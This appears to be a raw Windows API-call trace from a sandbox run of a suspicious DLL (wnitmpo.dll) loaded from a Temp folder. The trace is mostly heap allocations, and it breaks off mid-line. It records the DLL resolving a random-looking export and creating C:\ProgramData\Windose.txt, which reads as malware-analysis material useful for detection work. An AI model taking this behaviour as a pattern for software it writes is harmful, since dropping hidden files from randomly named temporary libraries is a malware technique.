[0118.941] GetLastError () returned 0x0 [0118.941] SetLastError (dwErrCode=0x0) [0118.941] GetLastError () returned 0x0 [0118.941] SetLastError (dwErrCode=0x0) [0118.941] GetLastError () returned 0x0 [0118.941] SetLastError (dwErrCode=0x0) [0118.941] GetLastError () returned 0x0 [0118.941] SetLastError (dwErrCode=0x0) [0118.941] GetLastError () returned 0x0 [0118.941] SetLastError (dwErrCode=0x0) [0118.941] GetLastError () returned 0x0 [0118.941] SetLastError (dwErrCode=0x0) [0118.941] GetLastError () returned 0x0 [0118.941] SetLastError (dwErrCode=0x0) [0118.941] GetLastError () returned 0x0 [0118.941] SetLastError (dwErrCode=0x0) [0118.941] GetLastError () returned 0x0 [0118.941] SetLastError (dwErrCode=0x0) [0118.942] GetLastError () returned 0x0 [0118.942] SetLastError (dwErrCode=0x0) [0118.942] GetLastError () returned 0x0 [0118.942] SetLastError (dwErrCode=0x0) [0118.942] GetLastError () returned 0x0 [0118.942] SetLastError (dwErrCode=0x0) [0118.942] GetLastError () returned 0x0 [0118.942] SetLastError (dwErrCode=0x0) [0118.942] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x9c) returned 0xc9184f0 [0118.943] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x1f) returned 0xc6e3d70 [0118.943] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x2e) returned 0xc9ae1f8 [0118.943] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x37) returned 0x10266008 [0118.943] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x3c) returned 0x10263018 [0118.943] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x31) returned 0x10265b48 [0118.943] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x14) returned 0xc792750 [0118.943] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x24) returned 0xc706c60 [0118.943] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x31) returned 0x10265b08 [0118.943] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x28) returned 0xc706c90 [0118.943] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xd) returned 0xca255d0 [0118.943] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x1d) returned 0xc6e3910 [0118.943] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x31) returned 0x10265f88 [0118.943] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x15) returned 0xc7927b0 [0118.945] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x17) returned 0xc792950 [0118.945] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xe) returned 0xca25660 [0118.945] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x69) returned 0xc9684a8 [0118.945] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x3e) returned 0x102632e8 [0118.945] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x1b) returned 0xc6e3f00 [0118.945] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x1d) returned 0xc6e41a8 [0118.946] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x48) returned 0xca3f470 [0118.946] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x12) returned 0xc792770 [0118.946] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x18) returned 0xc792670 [0118.946] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x1b) returned 0xc6e4068 [0118.946] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x24) returned 0xc706cc0 [0118.946] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x29) returned 0xc9add28 [0118.946] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x1e) returned 0xc6e4040 [0118.946] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x6b) returned 0xc967968 [0118.946] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x17) returned 0xc7927d0 [0118.946] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x14) returned 0xc792870 [0118.946] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xf) returned 0xca255e8 [0118.946] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x16) returned 0xc792730 [0118.946] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x2a) returned 0xc9ae038 [0118.946] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x29) returned 0xc9adbd8 [0118.946] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x12) returned 0xc7927f0 [0118.946] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x21) returned 0xc7071a0 [0118.946] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x16) returned 0xc7928b0 [0118.946] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x22) returned 0xc706e10 [0118.946] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x12) returned 0xc7928d0 [0118.946] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xcaae550 | out: hHeap=0x7e0000) returned 1 [0118.947] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x80) returned 0xca32d98 [0118.947] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x800) returned 0xb3dbf00 [0118.947] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0118.948] RtlSizeHeap (HeapHandle=0x7e0000, Flags=0x0, MemoryPointer=0xca32d98) returned 0x80 [0118.950] RtlSizeHeap (HeapHandle=0x7e0000, Flags=0x0, MemoryPointer=0xca32d98) returned 0x80 [0118.950] RtlSizeHeap (HeapHandle=0x7e0000, Flags=0x0, MemoryPointer=0xca32d98) returned 0x80 [0118.950] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x4) returned 0xc91bdb0 [0118.951] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e3f28 [0118.951] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x2) returned 0xc91bd10 [0118.951] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bd10 | out: hHeap=0x7e0000) returned 1 [0118.951] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x2) returned 0xc91bd10 [0118.952] RtlSizeHeap (HeapHandle=0x7e0000, Flags=0x0, MemoryPointer=0xca32d98) returned 0x80 [0118.953] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x4) returned 0xc91bd20 [0118.953] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x18) returned 0xc7928f0 [0118.953] GetLastError () returned 0x0 [0118.953] SetLastError (dwErrCode=0x0) [0118.953] GetLastError () returned 0x0 [0118.953] SetLastError (dwErrCode=0x0) [0118.953] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xb8) returned 0xb3e8a18 [0118.953] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x6a6) returned 0xcaae550 [0118.954] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xcaae550 | out: hHeap=0x7e0000) returned 1 [0118.954] GetLastError () returned 0x0 [0118.954] SetLastError (dwErrCode=0x0) [0118.954] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x6) returned 0xc91bd30 [0118.955] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x2) returned 0xc91bca0 [0118.955] GetLastError () returned 0x0 [0118.955] SetLastError (dwErrCode=0x0) [0118.955] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x4) returned 0xc91bd50 [0118.955] GetLastError () returned 0x0 [0118.955] SetLastError (dwErrCode=0x0) [0118.955] GetLastError () returned 0x0 [0118.955] SetLastError (dwErrCode=0x0) [0118.955] GetLastError () returned 0x0 [0118.955] SetLastError (dwErrCode=0x0) [0118.955] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xb8) returned 0xb3e8f58 [0118.955] GetLastError () returned 0x0 [0118.955] SetLastError (dwErrCode=0x0) [0118.955] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x6a6) returned 0xcaae550 [0118.955] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xcaae550 | out: hHeap=0x7e0000) returned 1 [0118.955] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bd30 | out: hHeap=0x7e0000) returned 1 [0118.955] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xb3e8a18 | out: hHeap=0x7e0000) returned 1 [0118.956] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bd50 | out: hHeap=0x7e0000) returned 1 [0118.956] GetLastError () returned 0x0 [0118.956] SetLastError (dwErrCode=0x0) [0118.956] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x6) returned 0xc91bd50 [0118.956] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x2) returned 0xc91bc20 [0118.956] GetLastError () returned 0x0 [0118.956] SetLastError (dwErrCode=0x0) [0118.956] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x200) returned 0x1026b628 [0118.956] GetLastError () returned 0x0 [0118.956] SetLastError (dwErrCode=0x0) [0118.956] GetLastError () returned 0x0 [0118.956] SetLastError (dwErrCode=0x0) [0118.956] GetLastError () returned 0x0 [0118.956] SetLastError (dwErrCode=0x0) [0118.956] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x4) returned 0xc91bc60 [0118.956] GetLastError () returned 0x0 [0118.957] SetLastError (dwErrCode=0x0) [0118.957] GetLastError () returned 0x0 [0118.957] SetLastError (dwErrCode=0x0) [0118.957] GetLastError () returned 0x0 [0118.957] SetLastError (dwErrCode=0x0) [0118.957] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xb8) returned 0xb3e8c58 [0118.957] GetLastError () returned 0x0 [0118.957] SetLastError (dwErrCode=0x0) [0118.957] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x6a6) returned 0xcaae550 [0118.957] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xcaae550 | out: hHeap=0x7e0000) returned 1 [0118.957] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bd50 | out: hHeap=0x7e0000) returned 1 [0118.957] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xb3e8f58 | out: hHeap=0x7e0000) returned 1 [0118.957] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bc60 | out: hHeap=0x7e0000) returned 1 [0118.957] GetLastError () returned 0x0 [0118.957] SetLastError (dwErrCode=0x0) [0118.957] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x6) returned 0xc91bd30 [0118.957] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bc20 | out: hHeap=0x7e0000) returned 1 [0118.957] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bca0 | out: hHeap=0x7e0000) returned 1 [0118.957] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x8) returned 0xc91bde0 [0118.958] RtlSizeHeap (HeapHandle=0x7e0000, Flags=0x0, MemoryPointer=0xca32d98) returned 0x80 [0118.967] RtlSizeHeap (HeapHandle=0x7e0000, Flags=0x0, MemoryPointer=0xca32d98) returned 0x80 [0118.967] RtlSizeHeap (HeapHandle=0x7e0000, Flags=0x0, MemoryPointer=0xca32d98) returned 0x80 [0118.967] RtlSizeHeap (HeapHandle=0x7e0000, Flags=0x0, MemoryPointer=0xca32d98) returned 0x80 [0118.967] RtlSizeHeap (HeapHandle=0x7e0000, Flags=0x0, MemoryPointer=0xca32d98) returned 0x80 [0118.968] RtlSizeHeap (HeapHandle=0x7e0000, Flags=0x0, MemoryPointer=0xca32d98) returned 0x80 [0118.969] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x50) returned 0xca65b38 [0118.969] RtlSizeHeap (HeapHandle=0x7e0000, Flags=0x0, MemoryPointer=0xca32d98) returned 0x80 [0118.969] RtlSizeHeap (HeapHandle=0x7e0000, Flags=0x0, MemoryPointer=0xca32d98) returned 0x80 [0118.970] RtlSizeHeap (HeapHandle=0x7e0000, Flags=0x0, MemoryPointer=0xca32d98) returned 0x80 [0118.970] RtlSizeHeap (HeapHandle=0x7e0000, Flags=0x0, MemoryPointer=0xca32d98) returned 0x80 [0118.970] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x10) returned 0xca257e0 [0118.970] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4108 [0118.970] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca257e0 | out: hHeap=0x7e0000) returned 1 [0118.970] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x30) returned 0xc9adfc8 [0118.970] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4108 | out: hHeap=0x7e0000) returned 1 [0118.970] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x40) returned 0x10263060 [0118.971] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc9adfc8 | out: hHeap=0x7e0000) returned 1 [0118.971] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x60) returned 0xca3a368 [0118.971] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x10263060 | out: hHeap=0x7e0000) returned 1 [0118.971] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x90) returned 0xca34058 [0118.971] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca3a368 | out: hHeap=0x7e0000) returned 1 [0118.971] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0xd0) returned 0xb38f308 [0118.971] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca34058 | out: hHeap=0x7e0000) returned 1 [0118.971] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x130) returned 0xca7c2e8 [0118.971] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xb38f308 | out: hHeap=0x7e0000) returned 1 [0118.971] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x1c0) returned 0xca86070 [0118.971] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca7c2e8 | out: hHeap=0x7e0000) returned 1 [0118.971] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x10) returned 0xca25690 [0118.971] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4018 [0118.972] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca25690 | out: hHeap=0x7e0000) returned 1 [0118.972] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x30) returned 0xc9ae150 [0118.972] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4018 | out: hHeap=0x7e0000) returned 1 [0118.972] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x40) returned 0x10263210 [0118.972] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc9ae150 | out: hHeap=0x7e0000) returned 1 [0118.972] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x60) returned 0xca3a640 [0118.972] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x10263210 | out: hHeap=0x7e0000) returned 1 [0118.972] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x90) returned 0xca33a68 [0118.972] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca3a640 | out: hHeap=0x7e0000) returned 1 [0118.972] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x30) returned 0xc9adee8 [0118.972] RtlSizeHeap (HeapHandle=0x7e0000, Flags=0x0, MemoryPointer=0xca32d98) returned 0x80 [0118.974] GetProcAddress (hModule=0x690d0000, lpProcName="Tswmnjioffws") returned 0x690d35e0 [0118.974] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4180 [0118.974] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4018 [0118.974] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4220 [0118.974] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4108 [0118.974] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e41f8 [0118.974] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x30) returned 0xc9ade40 [0118.974] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x30) returned 0xc9add98 [0118.974] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x50) returned 0xca65c40 [0118.974] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x30) returned 0xc9ae118 [0118.974] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e46d0 [0118.974] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4360 [0118.974] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4400 [0118.974] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4770 [0118.974] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4310 [0118.974] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4338 [0118.974] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e45e0 [0118.974] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e44c8 [0118.974] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x50) returned 0xca65b90 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4388 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4540 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e43b0 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4478 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e45b8 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x30) returned 0xc9adfc8 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4798 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4428 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4590 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e47c0 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x30) returned 0xc9addd0 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e46f8 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e44a0 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4450 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x30) returned 0xc9ae070 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x30) returned 0xc9ade08 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x30) returned 0xc9adba0 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x30) returned 0xc9ae230 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x30) returned 0xc9adc80 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e44f0 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4608 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e43d8 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4518 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4568 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4630 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4658 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x30) returned 0xc9ade78 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x30) returned 0xc9adf20 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x60) returned 0xca3adf8 [0118.975] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4720 [0118.976] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x691149b4, phModule=0x6f6dec | out: phModule=0x6f6dec*=0x690d0000) returned 1 [0118.976] GetModuleFileNameW (in: hModule=0x690d0000, lpFilename=0x6f71a8, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\wnitmpo.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\wnitmpo.dll")) returned 0x30 [0118.978] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x70) returned 0xc967bc0 [0118.978] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x40) returned 0x10263060 [0118.979] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x208) returned 0xca73e40 [0118.979] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0xca73e40 | out: pszPath="C:\\ProgramData") returned 0x0 [0118.980] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4748 [0118.980] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4748 | out: hHeap=0x7e0000) returned 1 [0118.980] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x1) returned 0xc91bc60 [0118.980] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x2) returned 0xc91bc70 [0118.980] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bc60 | out: hHeap=0x7e0000) returned 1 [0118.980] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x3) returned 0xc91bdd0 [0118.980] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bc70 | out: hHeap=0x7e0000) returned 1 [0118.980] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x4) returned 0xc91bd70 [0118.980] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bdd0 | out: hHeap=0x7e0000) returned 1 [0118.980] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x6) returned 0xc91bcb0 [0118.980] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bd70 | out: hHeap=0x7e0000) returned 1 [0118.980] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x9) returned 0xca25678 [0118.980] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bcb0 | out: hHeap=0x7e0000) returned 1 [0118.980] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0xd) returned 0xca25528 [0118.980] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca25678 | out: hHeap=0x7e0000) returned 1 [0118.980] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x13) returned 0xc792970 [0118.980] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xca25528 | out: hHeap=0x7e0000) returned 1 [0118.980] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x10) returned 0xca25768 [0118.980] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4748 [0118.980] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc6e4748 | out: hHeap=0x7e0000) returned 1 [0118.980] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc792970 | out: hHeap=0x7e0000) returned 1 [0118.980] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x20) returned 0xc6e4748 [0118.981] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x4) returned 0xc91be10 [0118.981] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x4) returned 0xc91bd70 [0118.981] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x18) returned 0xc792970 [0118.981] GetCurrentPackageId () returned 0x3d54 [0118.981] AreFileApisANSI () returned 1 [0118.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xc6e4748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0118.981] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x36) returned 0x10265d88 [0118.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xc6e4748, cbMultiByte=-1, lpWideCharStr=0x10265d88, cchWideChar=27 | out: lpWideCharStr="C:\\ProgramData\\Windose.txt") returned 27 [0118.982] CreateFileW (lpFileName="C:\\ProgramData\\Windose.txt" (normalized: "c:\\programdata\\windose.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x6f6be0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcb0 [0118.983] GetFileType (hFile=0xcb0) returned 0x1 [0118.983] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0x10265d88 | out: hHeap=0x7e0000) returned 1 [0118.983] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x8) returned 0xc91bc20 [0118.983] GetLastError () returned 0x0 [0118.984] SetLastError (dwErrCode=0x0) [0118.984] GetLastError () returned 0x0 [0118.984] SetLastError (dwErrCode=0x0) [0118.984] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xb8) returned 0xb3e8718 [0118.984] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x6a6) returned 0xcaae550 [0118.984] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xcaae550 | out: hHeap=0x7e0000) returned 1 [0118.984] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xc91bd30 | out: hHeap=0x7e0000) returned 1 [0118.984] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xb3e8c58 | out: hHeap=0x7e0000) returned 1 [0118.984] GetLastError () returned 0x0 [0118.984] SetLastError (dwErrCode=0x0) [0118.984] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x6) returned 0xc91bc90 [0118.984] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x2) returned 0xc91bd30 [0118.984] GetLastError () returned 0x0 [0118.984] SetLastError (dwErrCode=0x0) [0118.984] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0x4) returned 0xc91bd50 [0118.984] GetLastError () returned 0x0 [0118.984] SetLastError (dwErrCode=0x0) [0118.984] GetLastError () returned 0x0 [0118.984] SetLastError (dwErrCode=0x0) [0118.984] GetLastError () returned 0x0 [0118.984] SetLastError (dwErrCode=0x0) [0118.985] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xb8) returned 0xb3e8958 [0118.985] GetLastError () returned 0x0 [0118.985] SetLastError (dwErrCode=0x0) [0118.985] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x0, Size=0x6a6) returned 0xcaae550 [0118.985] HeapFree (in: hHeap=0x7e0000, dwFlags=0x0, lpMem=0xcaae550 | out: hHeap=0x7e0000) 